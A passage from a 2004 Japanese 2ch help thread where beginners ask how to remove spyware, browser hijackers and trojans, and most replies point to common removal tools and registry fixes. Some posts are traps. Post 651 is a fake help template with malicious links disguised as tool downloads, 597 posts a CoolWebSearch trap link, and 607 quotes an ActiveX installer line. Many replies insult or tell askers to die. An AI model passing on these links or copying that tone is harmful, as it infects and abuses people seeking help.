  /            /                \
 |            /                   ヽ
 |            '''''"´)   ●   \─/  ●   |'´)
  \           -‐´         ヽ/       /´
   |       |   \                  /
   |       |    ~~~~|~~

495 :490:04/07/10 06:25 ID:7H4Fb9VL
>>492 ありがとうございます。
490に書き忘れてしまいましたが、_restoreのトコにもウイルスがあったので、
復元ポイントの破棄をして、他のウイルスを削除しました。
>>10をやってみました。ログは保存しましたが、
もうすぐバイトに行く時間なので、帰宅後にこちらに貼ろうと思います。
ありがとうございました。

496 :ひよこ名無しさん:04/07/10 06:31 ID:???
>>495
貼って出かければ帰ってきた時に回答が書いてあって (゚д゚)ウマー

497 :ひよこ名無しさん:04/07/10 06:34 ID:???
質問です

1、ホームがエロサイトに固定された
2、ウイルスが13個発見された
3、ウイルスを全部削除した(もう一度スキャンしても発見されなかった)
4、まだエロサイトに固定されてる
5、>>11の1、2、5を実行した
6、エロサイトに飛ばなくなった

もう大丈夫でしょうか?

498 :497:04/07/10 06:36 ID:???
ホームが固定されてたころは、再起動しようとすると
「Win Minが終了してません」
みたいなメッセージが毎回出てましたが、今はでなくなりました。

499 :ひよこ名無しさん:04/07/10 06:47 ID:???
>>497
ウィルススキャンして何もなく症状も無いならOK。

症状が出たら、またおいで。

500 :497:04/07/10 06:48 ID:???
>>499
どうもありがとうございます。

501 :ひよこ名無しさん:04/07/10 07:31 ID:???
>>497
ウイルスが13個もあったのか・・・

502 :ひよこ名無しさん:04/07/10 07:52 ID:nJYAYGPh

へんな広告がでる(外国)
あど哀れとスパイボットやったけど 治らない!
なんで?

503 :ひよこ名無しさん:04/07/10 08:10 ID:???
>>502
それに引っかからないスパイウェアがPCの中に潜んでいるから

504 :ひよこ名無しさん:04/07/10 08:13 ID:nJYAYGPh
どうしたらなおりますか?

505 :ひよこ名無しさん:04/07/10 08:18 ID:???
症状は、変な広告が出るだけなん?

506 :ひよこ名無しさん:04/07/10 08:21 ID:???
>504
テンプレひととおり試してみたら?

507 :ひよこ名無しさん:04/07/10 08:22 ID:grB1cP9k
アップデートしたバスターでもひっかからないウイルスだってある
漏れなんか5こあった。トレンドマイクロのオンラインスキャン
お勧めするよ>502ついでに俺はもう手遅れだった…

508 :ひよこ名無しさん:04/07/10 08:22 ID:???
>>504
これを実行

ブラウザジャッカーCoolWebSearch駆除ツール CoolWebShredderをDL
http://higaitaisaku.web.infoseek.co.jp/removecws.html#jyokyo →OS再起動


509 :ひよこ名無しさん:04/07/10 08:22 ID:nJYAYGPh
いろいろ やられましたが(IEのTOPページ書き換えとか
あど哀れなど使って
広告だけになりました(多分

510 :ひよこ名無しさん:04/07/10 08:56 ID:nJYAYGPh
オンラインスキャンで5個 菌が見つかったので
手動で削除しました。

これでいいでしょうか!?

511 :ひよこ名無しさん:04/07/10 09:01 ID:nJYAYGPh
CoolWebSearchもやったほうがいいですかねぇ?
あんま関係なさそうだけど・・・

512 :ひよこ名無しさん:04/07/10 09:31 ID:???
>>509-511
再インストールした方が良いと思うよ。マジで

513 :ひよこ名無しさん:04/07/10 12:25 ID:lH95IXXc
180search assistant alert
とでるのですがどうすれば解決できますか?
テンプレのどこを参照にしていいのかわからなくて…

514 :ひよこ名無しさん:04/07/10 12:27 ID:???
>>513
だから、テンプレよく読めよ。クズ。
あっちで質問して数分しか経って無い。
面倒なだけだろ?お前。

515 :ひよこ名無しさん:04/07/10 12:30 ID:???
winampの中ってスパイウェア入ってませんよね?
突如HDDからwinampが消えてしまったんですが
思い当たることといえば先ほどスパイウェアの除去ツールを使ったことくらいなんですよね。
どうしちゃったんでしょうか??

516 :ひよこ名無しさん:04/07/10 12:31 ID:???
>>513
('A`)つ ttp://www.symantec.com/region/jp/sarcj/data/a/adware.180search.html

517 :ひよこ名無しさん:04/07/10 12:32 ID:???
>>515
HDDから消えた?本当にないんだろうな?あ?




実際はwinampの実効ファイル名変えられたのかもな。

518 :ひよこ名無しさん:04/07/10 12:35 ID:???
>>513
何の事かサパーリ分かりませんが・・・

519 :ひよこ名無しさん:04/07/10 12:41 ID:???
>>515
Program Files\winamp以下がごっそり無くなったのか?

520 :ひよこ名無しさん:04/07/10 12:42 ID:???
>513
わからないなら全部やれ。
とりあえず親切な>516のリンクも参照せよ。

521 :ひよこ名無しさん:04/07/10 13:08 ID:???
前にSarch Forタイプのスパイウェアを踏んで以来、
半角板にはさっぱり行く気が起こらない漏れ。

522 :ひよこ名無しさん:04/07/10 13:23 ID:???
>>517 >>519
ないっす。違うとこに保存してたかもわからんので
一応HDD内全部検索したけどなかったですの。
ちなみにmp3形式のファイルの関連付けは全て外されてました(/ω\)

523 :ひよこ名無しさん:04/07/10 13:26 ID:???
アンチスパイでwinampのディレクトリごと消すなどというのは
まず無いと思うが…。

524 :ひよこ名無しさん:04/07/10 13:26 ID:???
>>522
▼━ 質問のしかた ━━━━━━━━━━━━━━━
 ★E-mail欄には何も記入しない★(IDを出す→偽者対策・質問者の区別、2回目以降も)
 * 2回目以降の書込みは、最初に質問した際の「発言番号」を名前欄に入力する

WMPを書き換えるスパイウエアじゃないか?

525 :ひよこ名無しさん:04/07/10 13:34 ID:MFCpbDM9
516のリンクを参考にさせてもらおうと見たのですが駆除方法の
1. ウイルス定義を更新する
最新のウイルス定義を入手するには、
シマンテック・アンチウイルス・プログラムを開き
LiveUpdate を実行します。←この実行方法がわからず
2.B 180Search Assistant をクリックします。←これがみつからず
3. 感染ファイルを探して削除する
a シマンテック・アンチウイルス・プログラムを開き←開き方がわからず

4. レジストリに追加された値を削除する
MSBB ←がみつかりません。

引き続きアドバイスお願いいたします


526 :ひよこ名無しさん:04/07/10 13:38 ID:???
誰だよ

527 :513.525:04/07/10 13:55 ID:MFCpbDM9
テンプレの6試したら解決できました。
親切にアドバイスしてくれた方々本当にありがとうございました。
あと>>526ようなやつやくだらんレス入れるやつマジで市ね

528 :ひよこ名無しさん:04/07/10 13:55 ID:???
>>522
Winampフォルダはあるだろうに。

529 :ひよこ名無しさん:04/07/10 13:56 ID:???
>>525
CoolWebShredder、Ad-Aware、Spybot-S&D
を実行する前にコントロールパネルのプログラムの追加と削除から、
削除するだけ。
その後にAd-Awareでごみ掃除。

ちなみに先にCoolWebShredder、Ad-Aware、Spybot-S&D
を実行するとごみが残って大変。

530 :ひよこ名無しさん:04/07/10 13:59 ID:a76wkD8w
はじめまして
どっかでおかしなエロ系URLを踏んだらしくて
普段はIEのホームはヤフーにしてるんですがそれ以来
ホームがロリっぽいところになってしまい、
設定しなおしても立ち上げるたびにまた元にもどってしまう状況になってしまいました
また、デスクトップにもエロ系のアイコンがあって削除しても再び立ち上げれば
復活してしまう状況になってます・・・どう対処したらよいのでしょうか?

531 :ひよこ名無しさん:04/07/10 14:01 ID:???
ロリコン

532 :ひよこ名無しさん:04/07/10 14:03 ID:???
>>530
http://asia111.com/mgp/23z5t/5.mpeg

533 :ひよこ名無しさん:04/07/10 14:03 ID:???
>>530
1、テンプレ読んで実行する
2、氏ぬ

好きな方を選んでください。

534 :ひよこ名無しさん:04/07/10 14:04 ID:???
>>530
つながるページのURLや症状を書いてくれると、もと早く解決するかも。
その説明だと取りあえずテンプレの>>11を実行してみてください、
としか言えない。


535 :530:04/07/10 14:17 ID:a76wkD8w
すいません 説明不足でした
IEのホームになってしまうURLはhttp://www.cyber-lolita.net/
ってところでデスクトップに出てくるアイコンはRawSexってアイコンが
立ち上げるたびにでてきてます その他にゴミ箱に入れてゴミ箱を開いてみても
何も入っていない状況です

536 :ひよこ名無しさん:04/07/10 14:21 ID:???
エロを見る時ぐらいOPERAにしとけばいいのに

537 :ひよこ名無しさん:04/07/10 14:22 ID:???
質問があります。
ブラウザを起動してる、してないに限らずに
IEの小窓が1・2時間ごとに開きます・・・
激しくウザイし、PCに負担がかかるのでどうにかしたいのですが、
解決法はあるでしょうか・・・?

538 :ひよこ名無しさん:04/07/10 14:23 ID:???
>>537
ログもテンプレも読まない人はお帰りください。

539 :ひよこ名無しさん:04/07/10 14:26 ID:???
すいません・・・
難しい用語とかわかんないないんで・・・

540 :ひよこ名無しさん:04/07/10 14:28 ID:???
>>539
用語の問題じゃない。
掲示板の基本的なルール。

541 :ひよこ名無しさん:04/07/10 14:34 ID:???
>>535
RawSex情報
ttp://higaitaisaku.web.infoseek.co.jp/cgi-bin/ht/database.cgi?cmd=dp&num=64
BKDR_CALYPS.A情報
ttp://higaitaisaku.web.infoseek.co.jp/cgi-bin/ht/database.cgi?cmd=dp&num=19

RawSexだけなら
>>5のテンプレの7) 定番駆除ツールで駆除  a)→b)→c)の順に実行してください。
たぶんこれだけで治るはずです。
それぞれのツールを使うときにはアップデートしてから実行してください。

治らなかったら>>10へ移ってください。

542 :ひよこ名無しさん:04/07/10 14:34 ID:55AkiS+j
>>539
難しい用語を理解しようとしないのならば
そのままガマンしてね(・∀・)

543 :530:04/07/10 15:15 ID:a76wkD8w
>541
ありがとうございます
>>5のb cはどうやって実行したらいいのでしょうか?

544 :ひよこ名無しさん:04/07/10 15:16 ID:???
>>543
いじくるつくーる使え

545 :ひよこ名無しさん:04/07/10 15:19 ID:???
>>539
難しいと思ったらその言葉が何なのかGoogleとかで検索してください。
これ、常識です。

>>543
何もかも全て聞こうとしないこと。
ttp://higaitaisaku.web.infoseek.co.jp/menu5.html
こことか読んもう少し努力。
そうじゃないと又同じような状況になったときに対処できないし、
安全に対する意識があまりつかないままになってしまう。

546 :490:04/07/10 20:30 ID:7H4Fb9VL
朝にも書き込みました>>490です。
帰宅後再度ウイルススキャン→ファイル検索→ファイル削除をしましたが、
・TROJ_AGENT.AC
・TROJ_SMALL.IX
この2つで検索して出てくる4つのファイルを削除後、再起動すると
「レジストリにアクセス中エラーが発生しました」といったメッセージが出て
「レジストリを修復し再起動」され、削除したファイルも復活してしまいます。
(他のウイルスを削除する為に、復元ポイントの破棄をしました)
OSはWinMEで、ブラウザはIE6.0です。先程やり直したHijackログを貼ります。

547 :490:04/07/10 20:30 ID:7H4Fb9VL
Logfile of HijackThis v1.97.7
Scan saved at 20:14:39, on 2004/07/10
Platform: Windows ME (Win9x 4.90.3000)
MSIE: Internet Explorer v6.00 SP1 (6.00.2800.1106)

Running processes:
C:\WINDOWS\SYSTEM\KERNEL32.DLL
C:\WINDOWS\SYSTEM\MSGSRV32.EXE
C:\WINDOWS\SYSTEM\mmtask.tsk
C:\WINDOWS\SYSTEM\MPREXE.EXE
C:\WINDOWS\SYSTEM\MSTASK.EXE
C:\WINDOWS\SYSTEM\SSDPSRV.EXE
C:\WINDOWS\SYSTEM\MDM.EXE
C:\WINDOWS\SYSTEM\STIMON.EXE
C:\WINDOWS\EXPLORER.EXE
C:\WINDOWS\SYSTEM\IMEJPMGR.EXE
C:\WINDOWS\SYSTEM\RESTORE\STMGR.EXE
C:\WINDOWS\SYSTEM\INTERNAT.EXE
C:\WINDOWS\TASKMON.EXE
C:\WINDOWS\SYSTEM\SYSTRAY.EXE

548 :ひよこ名無しさん:04/07/10 20:32 ID:???
>>546
Reg : HKEY_CURRENT_USER\
Software\Microsoft\Windows\CurrentVersion\Run

上の該当するレジストリを削除してないんじゃないのか?

549 :490:04/07/10 20:35 ID:7H4Fb9VL
>>548
あ、ありがとうございます。
そのレジストリの削除というのは…テンプレにありますか?
朝テンパってたので読み逃してるかもしれませんので
もう一度読んできます。すみません。

550 :ひよこ名無しさん:04/07/10 21:18 ID:???
>>549
TROJ_AGENT.AC
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=TROJ_AGENT.AC
レジストリ値 "AppInit_DLLs" に追加された値の修復を

551 :ひよこ名無しさん:04/07/10 21:31 ID:Ik6ENu5r
お尋ねしたいのですが、spybotで駆除しても
消えないスパイウェアがあるのですが、何故なんでしょうか?
教えてください。

552 :ひよこ名無しさん:04/07/10 21:31 ID:v2V5hOW7
エロサイトのムービーダウンロードしてからです。

ゴミ箱をクリックして全て消去しようとしても、「エラーが発生したため、exploere.exeを終了します。プログラムをもう一度
開始する必要があります」となっています。

ゴミ箱をキレイにするには、どうしたらいいでしょうか?

553 :ひよこ名無しさん:04/07/10 21:37 ID:???
>>551
spybotは特定のスパイの駆除を得意とし、そうでないスパイは駆除しにくいから。
アドアウェアでもスキャンしてみ

554 :ひよこ名無しさん:04/07/10 21:43 ID:???
>>552
エクスプローラでexploere.exeを探し、リネームなどで様子を見て動きが怪しければそこで削除

555 :ひよこ名無しさん:04/07/10 21:43 ID:Ik6ENu5r
>>553
ありがとうございます。
発見しても消せない場合があるのですね。

556 :ひよこ名無しさん:04/07/10 21:53 ID:v2V5hOW7
>>554

すみません、初心者なもので・・・。
エクスプローラーで探す、とは具体的な操作方法をご教授くだされば幸いです。



557 :ひよこ名無しさん:04/07/10 21:57 ID:???
>>556
タスクバーの「スタート」を右クリック→「エクスプローラ」

558 :ひよこ名無しさん:04/07/10 22:06 ID:v2V5hOW7
>>557
あなたのような頭脳明晰な方に相手にしてくださって光栄です。
そうしたのですが、「エラーが発生したため、EXPLORER.EXEを終了します」
となってしまいました。

すみません、もう少し相手にしてくだされば嬉しいです。

どうしたらいいでしょうか??

559 :ひよこ名無しさん:04/07/10 22:10 ID:???
媚びすぎててキモイから放置しよう

560 :ひよこ名無しさん:04/07/10 22:18 ID:???
>>558
regeditが弄られているな、それ。
spybotやad-awareでスキャンしたのか?

561 :ひよこ名無しさん:04/07/10 22:19 ID:v2V5hOW7
>>559
これは、かなり難しく、解決不可能ということでしょうか?

562 :ひよこ名無しさん:04/07/10 22:21 ID:???
◆US-CERT「IEの乗り換え」を勧める警告で、『Mozilla』ユーザーが急増
http://hotwired.goo.ne.jp/news/news/technology/story/20040705302.html

◆Firefox0.9.2(無料・最新版)→セキュリティ問題公開から1日足らずで修正版リリース!
http://jt.mozilla.gr.jp/products/firefox/

◆スクリーンショットもあるインストールガイド
http://shiten.s13.xrea.com/install.htm

◆Internet Explorer から Mozilla Firefox への移行手順
http://jt.mozilla.gr.jp/products/firefox/switch.html

◆Mozilla 日本語ローカライズ版リンク集
http://level.s69.xrea.com/mozilla/jp.html

563 :ひよこ名無しさん:04/07/10 22:21 ID:v2V5hOW7
>>560
申し訳ありません。私の頭脳では、意味がわかりません。
すみません、意味を教えてくだされば幸いです。

564 :ひよこ名無しさん:04/07/10 22:25 ID:???
>>563
このスレの>>5に書いてあるから落ち着いてやってみて。

565 :ひよこ名無しさん:04/07/10 22:25 ID:m0ZFoNYL
Secureにやられたみたいなんですが、まとめサイト書いてあること以外で
マイコンピューターとごみ箱を開くとフリーズします。
ウイルスですか??



566 :ひよこ名無しさん:04/07/10 22:33 ID:???
>>565
スキャンすればわかるのでは?

567 :565:04/07/10 22:38 ID:m0ZFoNYL
何でやればいいのですか?
PC素人なのでしょうもない質問ですみません。

568 :ひよこ名無しさん:04/07/10 22:41 ID:v2V5hOW7
>>564
やってみます。心から感謝します。

569 :ひよこ名無しさん:04/07/10 22:47 ID:???
>>565
http://www.trendmicro.com/jp/home/enterprise.htm
のウイルスバスターオンラインスキャン

570 :ひよこ名無しさん:04/07/10 22:56 ID:m0ZFoNYL
>>569
早速やってみます。
あいがとうございました!


571 :490:04/07/10 22:56 ID:7H4Fb9VL
>>548を見て、テンプレにあるページを複数見てたのですが、
削除のやり方がよくわかりませんでした。
ついさっき>>550を見て、説明を見ながらやってみたのですが、
「CurrentVersion」の中に「Windows」がありません。
(drivers.deskとDrivers32というのがあります)
どうしたらいいものか…何度も本当にすみません。

572 :ひよこ名無しさん:04/07/10 23:22 ID:???
>>567
初心者なものでって、
少しは分からないことをGoogleとかで検索するクセつけないと。

573 :567:04/07/10 23:27 ID:m0ZFoNYL
以後気をつけます。
ウイルスバスターをダウンロードしたまでは良かったけど
インストールするとすぐフリーズする・・・。

574 :ひよこ名無しさん:04/07/11 00:09 ID:2+51bZFt
JavaをOFFにして入会画面でカード番号などを入力しましたが、
サインアップの最後のボタンを押したところ画面が真っ白でとまってしまいました。
ユーザーIDとパスワード入れてみたんですがはねられます。
ということは会員登録はされなかったと思っていいんでしょうか?
もう一度同じカードでやるとダブって入会になっちゃいませんか?


575 :ひよこ名無しさん:04/07/11 00:11 ID:???
>>574
コピペすんなヴォケ

576 :ひよこ名無しさん:04/07/11 00:17 ID:???
>>573
とりあえず、オンラインスキャンでウイルスが入っていないこと
確認した?
ダウンロードって体験版のこと?

577 :567:04/07/11 01:16 ID:K7XG743N
やっとできました。ウイルスは18個あった。
とりあいずウイルスバスター買うか。


578 :ひよこ名無しさん:04/07/11 01:48 ID:zBFU5dv6
ウイルスバスターでもダメポだった場合どうすれば…。
「駆除不可能」「隔離できませんでした」

WIN98、感染ファイル51個(゚∀゚)

579 :ひよこ名無しさん:04/07/11 02:07 ID:???
>>578
回線切って二度とインターネットをしないこと。

580 :ひよこ名無しさん:04/07/11 02:07 ID:???
普通,複数のウィルス駆除ツールを使うのはタブーだと言われてるんで……
 1. ウィルスバスターをアンインスコした上で他の駆除ツールを試す
 2. ウィルスバスターの定義ファイル(?)を更新するか
   ウィルスバスター自身のバージョンアップを待つ
 3. OSを再インストール
 4. 専門家を雇う
 5. 独学でなんとかやってしまう
 6. あきらめて生涯の伴侶とする
どれでもどうぞ。

581 :ひよこ名無しさん:04/07/11 02:09 ID:???
>>578
そんなに大量のウィルスがある場合はリカバリしたほうがいいと思いますよ。


582 :Opera 最新版 7.52公式?日本語版出たぞ:04/07/11 02:12 ID:???
下記のアドレスからダウンロードできる。ふつうに使うだけならjavaなしを推奨。
インストーラや言語ファイルもあらかじめ日本語になっている。言語ファイル
を別にダウンロードする必要もなく簡単。

javaあり ftp://ftp.opera.com/pub/opera/win/752/ja/java/ow32jaja752j.exe
javaなし ftp://ftp.opera.com/pub/opera/win/752/ja/std/ow32jaja752.exe

>>403のミラーサイトにあるのと同一ファイル
 http://public.planetmirror.com/pub/opera/win/752/ja/

この日本語版、Opera社のサイトに置いてあるんだから、公式版なんだろうが、
本社の玄関 http://www.opera.com/ から入ってもまだ見当たらない。

583 :ひよこ名無しさん:04/07/11 03:37 ID:???
Opera厨は好意か荒らしか分からんね。なんでそんなに頻繁に貼るんだ?

584 :ひよこ名無しさん:04/07/11 05:33 ID:???
正直、Operaも入れてみたけど、またDonutPに後戻り。

Opera重すぎだし、無料版は広告入るし。
DonutPだとサクサクだよ。


585 :名無しさん@そうだ選挙に行こう:04/07/11 09:02 ID:???
Operaもサクサクですが

586 :名無しさん@そうだ選挙に行こう:04/07/11 09:52 ID:???
>>583
同じOpera使いとして代わりにご迷惑をお詫びします。
色んな人がいるもんだ、ってことで勘弁してください。

587 :名無しさん@お腹いっぱい。:04/07/11 11:03 ID:???
添付ファイルの自動実行を抑止する
http://homepage3.nifty.com/soribada/img-box2/img20040618232747.html
あーこれWindows2000でもできたらいいなあああ

588 :名無しさん@そうだ選挙に行こう:04/07/11 11:09 ID:???
>>583
Operaじゃ困る? お前、地雷貼り屋だなw

589 :名無しさん@そうだ選挙に行こう:04/07/11 11:12 ID:???
Norton Internet Securityの調子が悪いので、
もしや・・・と思ったらスパイにやられてました。
けどここのスレの情報で無事完全除去できました。
お礼を言わせてください。ありがとうございました!

590 :名無しさん@そうだ選挙に行こう:04/07/11 11:19 ID:y9d1PIXm
思うに、本当の初心者は最新50しか見てないんだろうな。
スレの先頭にある「全部」とか「1−」をクリックして
レス番2−10ぐらいを読むと基本的な対処法は書いてある。
解からない言葉があったら、まずGoogle等で検索しましょう。

591 :名無しさん@そうだ選挙に行こう:04/07/11 11:21 ID:5+HEXQzW
http://m-space.jp/?lovemail
このサイトって安全ですか?

592 :名無しさん@そうだ選挙に行こう:04/07/11 11:34 ID:???
>>591
お金も手間もかけずにスパイ対策がしたいのなら、
非IEのWEBブラウザを採用しましょう。

エロサイトを安心して見れるタブブラウザー
Mozilla Firebird (フリー)
http://download.ascii.jp/win/3/00031/10975.html
Opera (アドウェア)
http://download.opera.com/

エロサイトを見なくてもIEを使ってる限りはスパイに潜入される
確率は大きいですよ。

593 :名無しさん@そうだ選挙に行こう:04/07/11 11:41 ID:???
>>592
その通りなんだがせめて10個くらい前のレスに目をとおして
おこうw  Opera最新日本語版 >>582


594 :名無しさん@そうだ選挙に行こう:04/07/11 11:47 ID:???
よく見てみたら情報が古かった。
Firebird→Firefoxに名称変更。

紹介としてはここが良くまとまってます。
Mozzila/Firefoxまとめサイト
http://software.s48.xrea.com/mozilla/index.php

初心者の人はこのサイトに書いてあるとおりにやると
簡単に導入できます。
Mozilla Firefox インストールガイド (for Win)
http://shiten.s13.xrea.com/install.htm

595 :名無しさん@そうだ選挙に行こう:04/07/11 12:26 ID:lnTvl3YA
まごごろ質問スレから誘導されました。
WindowsXPなんですが、タスクバーのところにいきなり変な検索窓がでてきて
実際に検索してみると、アメリカのヤフーだったりアメリカのグーグルだったりで
まったく意味がないんです。
しかも「ファイル」とか「ヘルプ」とか「お気に入り」とかがならんでる上のバーには
「Main Links」とかいうのがでてきて、クリックするとhttp://www.goldenpalace.com/playnow_aff.php?member=cdtinc&profile=affgp&banner=windowdl&t=0
につながります。本当に迷惑なので対処の仕方をお願いします。

596 :名無しさん@そうだ選挙に行こう:04/07/11 12:27 ID:???
>>1-10を読んでも、あまりよくわからない。。。
昨日の21時からいろいろがんがってるけど、さらにひどい状況になってしまった・・・。
どこをダウンロードしていいのやら・・・。

597 :名無しさん@そうだ選挙に行こう:04/07/11 12:28 ID:???
>>595
FAQ読んだか
http://greatsearch.biz/

598 :595:04/07/11 12:35 ID:lnTvl3YA
>>597
はい 読みました

599 :名無しさん@そうだ選挙に行こう:04/07/11 12:40 ID:???
>>596
アンチスパイとウイルススキャン全部やること。

600 :名無しさん@そうだ選挙に行こう:04/07/11 12:47 ID:???
>>597
Cool Web Searchの地雷をはっちゃ駄目ですよ。

601 :名無しさん@そうだ選挙に行こう:04/07/11 12:52 ID:???
>>596
誰?

602 :名無しさん@そうだ選挙に行こう:04/07/11 12:58 ID:5+HEXQzW
>>591
のサイト見た?ケータイのサイトなんだけど

603 :名無しさん@そうだ選挙に行こう:04/07/11 13:00 ID:???
>>595
誘導じゃなくてテンプレやれって言われてるんだろうが。クズ。死ね。


もう二度と来るな。不誠実な質問者だな。

604 :名無しさん@そうだ選挙に行こう:04/07/11 13:15 ID:???
>>600
それを読んだという>>595がいる

605 :名無しさん@そうだ選挙に行こう:04/07/11 13:49 ID:???
>>597は地雷?踏んだらどうなるの?

606 :名無しさん@そうだ選挙に行こう:04/07/11 15:14 ID:???
>>605
べつに何も。

607 :名無しさん@そうだ選挙に行こう:04/07/11 15:15 ID:???
>>597をFirefox0.9.2で踏んでた。
ZY Web Searchと言うページが表示されただけで、
ポップアップその他も全て駆逐しますた。

IEだとこんなんをインストールされる模様
classid="CLSID:11111111-1111-1111-1111-111111111237" codebase="1/deaJP10.exe"

608 :名無しさん@そうだ選挙に行こう:04/07/11 15:29 ID:???
>>605
>>597にCool Web Searchって書いてあるやん。
ひょっとして、もぐり?

609 :名無しさん@そうだ選挙に行こう:04/07/11 15:30 ID:???
>>608
下のアンカー間違えました。
>>600にです。

610 :名無しさん@そうだ選挙に行こう:04/07/11 16:19 ID:8h/QSWmm
テンプレの内容を試したのですが
ホームページがttp://here4search.com/hp.htm?id=191に固定されたままです。
どうすれば良いでしょうか?

611 :名無しさん@そうだ選挙に行こう:04/07/11 16:21 ID:???
>>610
試したって何を試したんだよ?

はっきり言って、絶対に試してない。

612 :名無しさん@そうだ選挙に行こう:04/07/11 16:38 ID:???
>>610
何を試したか全部かいてみそ

613 :名無しさん@そうだ選挙に行こう:04/07/11 17:15 ID:???
>>590
君面白いね

614 :名無しさん@そうだ選挙に行こう:04/07/11 18:01 ID:???
エロサイト見たら・・・助けてくだすーいすいすーだららったすらすらすいすいすーい♪

615 :名無しさん@そうだ選挙に行こう:04/07/11 18:42 ID:Cz70GDg/
エロって訳じゃないけどこんなのが出てきて困ってます。
どうしたら、削除できますか?
http://www.680180.net/Adlogix_pop.html
http://adlogix.com/zamingo/without.html
http://680180.net/Adlogix_pop.html
http://homebasedbusiness-japan.org/fss_int/RealTime3/v1_F.aspx?NoCount=1

616 :名無しさん@そうだ選挙に行こう:04/07/11 18:48 ID:???
>>615
質問するのは、>>1-11 を実行してからだ。

617 :名無しさん@そうだ選挙に行こう:04/07/11 18:53 ID:???
どーしてテンプレにある作業ひととおりやってから質問しないんだ!
>>1に書いてあるだろう、「一通りFAQを "実行" してもお手上げの場合は、質問しても良し」って
つまり、やってみたあとじゃないと質問しちゃダメ。わかる?

やってだめだった場合、>>1の「質問のしかた」に加えて
何をやったのか、どれがどんなふうにできなかったのか書くこと。

618 :名無しさん@そうだ選挙に行こう:04/07/11 19:30 ID:???
「そこを何とか・・お願いします!!!!1」
みたいな返答が帰ってきそうな予感

619 :ひよこ名無しさん:04/07/11 20:34 ID:ptxdh1MF
地道にやってます。ありがとう

620 :ひよこ名無しさん:04/07/11 20:36 ID:XmoV4nT4
Ad-aware Spybot シュレッダー 3点やってもabout:blankというスパイウェアーが

きえません どなたかたすけてください

621 :ひよこ名無しさん:04/07/11 20:43 ID:???
>>620
あぶない早く電源切れ つうかコンセント抜け

622 :ひよこ名無しさん:04/07/11 20:44 ID:???
>>620
そんな状態でつないでんじゃねーよ はげ!

623 :ひよこ名無しさん:04/07/11 20:45 ID:???
>>620
たいしたことねーよ そのままでおk

624 :ひよこ名無しさん:04/07/11 20:46 ID:???
>>620
テンプラ嫁

625 :ひよこ名無しさん:04/07/11 20:47 ID:???
>>620
一時ファイルの削除

626 :ぼるじょあ ◆yBEncckFOU :04/07/11 20:47 ID:???
(・3・) エェー ホーム空白にしてるとAd-Aware反応するよNE

627 :ひよこ名無しさん:04/07/11 20:48 ID:???
>>620
まず環境をかけ 話はそれからだ

628 :ひよこ名無しさん:04/07/11 20:52 ID:???
>>620
それ、一番手ごわい。

629 :ひよこ名無しさん:04/07/11 20:54 ID:???
>>620
再インスコ

630 :ひよこ名無しさん:04/07/11 20:54 ID:???
>>620
どうした? 早くでてこいよ

631 :ひよこ名無しさん:04/07/11 20:55 ID:???
>>620
いわれたこと一つ一つ実行すればきっとなおる がんばれ

632 :ひよこ名無しさん:04/07/11 20:57 ID:???
>>620
どうした? 手がとまってるぞ?

633 :ひよこ名無しさん:04/07/11 20:58 ID:???
>>620
レスついてんだから ぐずぐずすんな

634 :ひよこ名無しさん:04/07/11 21:00 ID:???
>>620
他にやったこと書け

635 :ひよこ名無しさん:04/07/11 21:03 ID:???
>>620
釣り宣言まだ〜?

636 :ひよこ名無しさん:04/07/11 21:05 ID:???
次の方どうぞ

637 :ひよこ名無しさん:04/07/11 21:07 ID:???
うるせー馬鹿

638 :ひよこ名無しさん:04/07/11 21:09 ID:???
早く質問してください!

639 :ひよこ名無しさん:04/07/11 21:12 ID:AEWU7qS7
スパイウェアやトロイの感染の心配なくハァハァできる
オススメのエロサイトを教えてください。

640 :ひよこ名無しさん:04/07/11 21:14 ID:???
>>639
自分で探せ

641 :ひよこ名無しさん:04/07/11 21:16 ID:???
彼氏が出来るサイトって何処ですか?

642 :ひよこ名無しさん:04/07/11 21:17 ID:???
>>639
そんな都合のいいのがあったら
あまりにも定番サイトとして有名になりすぎて今頃閉鎖してる
やっぱり自分で探すしかないって事

643 :ひよこ名無しさん:04/07/11 21:18 ID:???
>>641
いくつだ?

644 :ひよこ名無しさん:04/07/11 21:19 ID:???
ウンコ的なサイトを教えて

645 :ひよこ名無しさん:04/07/11 21:19 ID:???
>>643
5歳

646 :ひよこ名無しさん:04/07/11 21:19 ID:???
おまえら質問するならIDだせよ

647 :ひよこ名無しさん:04/07/11 21:20 ID:???
>>646
うるせー馬鹿

648 :ひよこ名無しさん:04/07/11 21:20 ID:???
>>645
炉にでもいってこい

649 :ひよこ名無しさん:04/07/11 21:20 ID:???
私のパンツを買ってください

650 :ひよこ名無しさん:04/07/11 21:21 ID:???
俺のブリーフも買え

651 :ひよこ名無しさん:04/07/11 21:23 ID:???
【緊急】 早く治したい方は以下を実行して下さい 【処置】

1)IEのホーム、検索ページを標準に戻す→ツール→
インターネットオプション→プログラム→WEB設定のリセット
2)IEの履歴削除→ツール→インターネットオプション→全般→
インターネット一時ファイル→クッキーの削除+ファイルの削除
3)削除したいファイルがあるが「アクセスできません。使用中です」等と
いわれて削除できない→セーフモード(F8を連打)でOSを起動→削除→OS再起動
4)勝手に追加されたアプリをアンインストする→スタート→コントロールパネル→
アプリケーションの追加と削除(JWordはここでアンインストする)→OS再起動

5)ブラウザジャッカーWeb pop&actions駆除ツール Web pop&actionsをDL
  http://gb.bbs.ws/add-gb.php?book=pop&action=new&pg=1 →OS再起動
6)定番スパイウェア除去ソフト↓をインストール(併用推奨)
 ・定番 スパイウェア除去ソフト Ad-Aware 使用法
  http://default-homepage-network.com/start.cgi?hkcu
 ・定番 スパイウェア除去ソフト Spybot-S&D 使用法
  http://ip3e83566f.speed.planet.nl/hacked-by-chinese/bla.htm

「システムの復元」で正常な状態に復帰させる方法もあります。
7)Me/XPの場合[スタート]→[すべてのプログラム]→[アクセサリ]→[システム ツール]→[システムの復元]

8)98の場合(一番古い日付は不可)
1. パソコンの電源を入れたら[Ctrl]キーを押しっぱなしにする
2. “Startup Menu”が表示されたら“Command Prompt Only”(コマンドプロンプトのみ)を選択する
3. 入力可能状態になったら、“scanreg”と入力してから[Enter]キーを押す
4. 日付の一覧が表示されるので、その中で復元したいと思うバックアップデータを選んで[Enter]キーを押す
5. 再起動を求められるので、再起動する


652 :ひよこ名無しさん:04/07/11 21:26 ID:???

>>651 偽リンク

653 :ひよこ名無しさん:04/07/11 21:28 ID:???
   / ̄ ̄'' -、
  (    / ) ヽ
  i r-,,,, /,,,, )
